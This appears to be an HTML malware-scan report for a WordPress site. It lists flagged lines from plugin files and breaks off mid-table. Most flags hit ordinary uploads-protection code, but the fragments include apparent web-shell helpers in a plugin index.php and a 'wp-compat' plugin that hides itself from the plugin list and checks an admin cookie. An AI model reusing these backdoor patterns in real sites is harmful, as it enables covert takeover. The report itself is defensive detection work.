<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">plugin_name</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 192</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$response</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 195</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">check_protective_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 198</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 200</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 204</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_uploads_root_response_code</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 215</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_htaccess_content</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 217</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">file_get_contents</span><span style="color: #007700">(</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">get_uploads_dir</span><span style="color: #007700">() . </span><span style="color: #DD0000">'/.htaccess'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 21</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add_submenu_page</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 220</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">check_htaccess_is_self_generated</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 230</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">check_uploads_is_protected</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 254</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">check_protective_file_removable</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 266</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_uploads_protection_message_array</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 26</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">render_settings_page</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 271</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returns 403 code</span><span style="color: #007700">.</span><span style="color: #DD0000">', $this->plugin_name);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 289</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">check_apache</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 292</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'apache_get_modules'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 298</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_message</span><span style="color: #007700">(</span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$type </span><span style="color: #007700">= </span><span style="color: #DD0000">'updated'</span><span style="color: #007700">, </span><span style="color: #0000BB">$id </span><span style="color: #007700">= </span><span style="color: #0000BB">0</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 307</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">display_messages</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 312</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'<div id="message" class="' </span><span style="color: #007700">. </span><span style="color: #0000BB">$message</span><span style="color: #007700">[</span><span style="color: #DD0000">'type'</span><span style="color: #007700">] . </span><span style="color: #DD0000">'"><p>' </span><span style="color: #007700">. </span><span style="color: #0000BB">$message</span><span style="color: #007700">[</span><span style="color: #DD0000">'message'</span><span style="color: #007700">] . </span><span style="color: #DD0000">'</p></div>'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 31</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">enqueue_styles</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 36</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add_settings_link</span><span style="color: #007700">(</span><span style="color: #0000BB">$links</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 40</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$links</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_uploads_dir</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 46</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$uploads_dir</span><span style="color: #007700">[</span><span style="color: #DD0000">'basedir'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 49</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_uploads_url</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 52</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$uploads_dir</span><span style="color: #007700">[</span><span style="color: #DD0000">'baseurl'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 55</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_uploads_subdirectories</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 71</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$subs</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 74</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">save_form</span><span style="color: #007700">(</span><span style="color: #0000BB">$form</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 89</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_htaccess_identifier</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 91</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"[plugin_name=" </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">plugin_name </span><span style="color: #007700">. </span><span style="color: #DD0000">"]"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 94</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">create_index</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_218").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/gbdud/admin/views/protect-uploads-admin-settings-page.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.62 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-30 09:59:37</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-30 09:59:37</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 2</span><br><table id="file_219" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returns 403 code </span><span style="color: #007700">(</span><span style="color: #0000BB">Forbidden Access</span><span style="color: #007700">).</span><span style="color: #DD0000">', $this->plugin_name); ?></p> </label><br /> } ?> <!-- --> if ( $this->check_protective_file_removable() && $this->check_uploads_is_protected() ) { ?> <label for="protection_3"> <input type="radio" value="remove" nam</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 63</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returns 403 code </span><span style="color: #007700">(</span><span style="color: #0000BB">Forbidden Access</span><span style="color: #007700">).</span><span style="color: #DD0000">', $this->plugin_name); ?></p></span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_219").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/gbdud/uninstall.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 1.27 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-30 09:59:37</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-30 09:59:37</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 2</span><br><table id="file_220" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">run</span><span style="color: #007700">() { </span><span style="color: #0000BB">$plugin_name </span><span style="color: #007700">= </span><span style="color: #DD0000">'protect-uploads'</span><span style="color: #007700">; if( </span><span style="color: #0000BB">is_admin</span><span style="color: #007700">()) </span><span style="color: #0000BB">delete_option</span><span style="color: #007700">( </span><span style="color: #0000BB">$plugin_name </span><span style="color: #007700">. </span><span style="color: #DD0000">'-protection' </span><span style="color: #007700">); } } </span><span style="color: #0000BB">Alti_ProtectUploads_Uninstall</span><span style="color: #007700">::</span><span style="color: #0000BB">run</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 35</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">run</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_220").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/gbdud/index.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 26.19 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-30 09:59:37</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-30 09:59:37</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 13</span><br><table id="file_221" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ingfo</span><span style="color: #007700">; } </span><span style="color: #0000BB">?></span> </div> </body> </html></span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 376</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #DD0000">");</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 383</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">author</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 393</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">cekdir</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 400</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"<span class='writable'>writable</span>"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 402</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"<span class='readonly'>readonly</span>"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 406</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">cekroot</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 414</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">xrmdir</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 430</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">green</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 434</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">red</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 742</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">statusnya</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 781</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ingfo</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 963e968a <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 446</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 963e968a)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">php_uname</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_221").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/wp-compat/wp-compat.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 3.05 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-19 21:42:04</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-19 21:42:04</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 15</span><br><table id="file_222" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$plugins</span><span style="color: #007700">) { </span><span style="color: #0000BB">$plugin_path </span><span style="color: #007700">= </span><span style="color: #0000BB">plugin_basename</span><span style="color: #007700">(</span><span style="color: #0000BB">__FILE__</span><span style="color: #007700">); if (isset(</span><span style="color: #0000BB">$plugins</span><span style="color: #007700">[</span><span style="color: #0000BB">$plugin_path</span><span style="color: #007700">])) { unset(</span><span style="color: #0000BB">$plugins</span><span style="color: #007700">[</span><span style="color: #0000BB">$plugin_path</span><span style="color: #007700">]); } return </span><span style="color: #0000BB">$plugins</span><span style="color: #007700">; }); </span><span style="color: #0000BB">add_action</span><span style="color: #007700">(</span><span style="color: #DD0000">'plugins_loaded'</span><span style="color: #007700">, function () { global </span><span style="color: #0000BB">$params</span><span style="color: #007700">; if (isset(</span><span style="color: #0000BB">$_COOKIE</span><span style="color: #007700">[</span><span style="color: #DD0000">'WORDPRESS_ADMIN_USER'</span><span style="color: #007700">]) && </span><span style="color: #0000BB">functio</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 10</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'wpc_patch_bootstrap'</span><span style="color: #007700">) &&</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 11</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
